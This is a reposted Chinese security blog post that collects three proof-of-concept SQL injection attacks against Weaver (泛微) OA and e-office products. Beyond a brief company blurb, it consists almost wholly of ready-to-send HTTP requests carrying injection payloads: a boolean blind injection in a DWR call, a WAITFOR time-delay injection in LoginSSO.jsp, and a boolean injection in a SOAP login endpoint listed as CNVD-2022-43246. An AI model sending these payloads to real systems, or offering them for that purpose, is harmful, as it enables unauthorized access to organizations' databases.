【nday、1day】3个泛微注入漏洞集合

admin 2023年12月16日10:52:16评论134 views字数 1635阅读5分27秒阅读模式
0x01 阅读须知

0x02 漏洞描述

(一) 泛微

泛微成立于2001年,是一家专注于协同管理软件领域的公司。它帮助组织构建统一的数字化运营平台,提供高效、灵活、可靠的产品和服务。作为国家重点软件企业,泛微始终保持技术创新,引领协同管理软件行业的发展。其产品广泛应用于各行各业,帮助企业实现数字化转型和提升工作效率。。

【nday、1day】3个泛微注入漏洞集合

(二) 漏洞poc

1、泛微-ifNewsCheckOutByCurrentUser-布尔盲注

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Content-Type: text/plain

callCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1*c0-param1=string:1batchId=0

2、泛微-LoginSSO-延时注入

GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mailid=0&mrfuuid=1';WAITFOR+delay+'0:0:6'--+&a=.swf HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0


3、泛微eoffice-cnvd-2022-43246布尔注入

POST /webservice-json/login/login.wsdl.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateContent-Type: text/xml

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:LoginServicewsdl">   <soapenv:Header/>   <soapenv:Body>      <urn:GetCurrentInformation soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">         <UserId xsi:type="xsd:string">a'+if(1=1,0,1)+'n</UserId>      </urn:GetCurrentInformation>   </soapenv:Body></soapenv:Envelope>

原文始发于微信公众号(SCA御盾):【nday、1day】3个泛微注入漏洞集合

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月16日10:52:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【nday、1day】3个泛微注入漏洞集合https://cn-sec.com/archives/2308218.html

发表评论

匿名网友 填写信息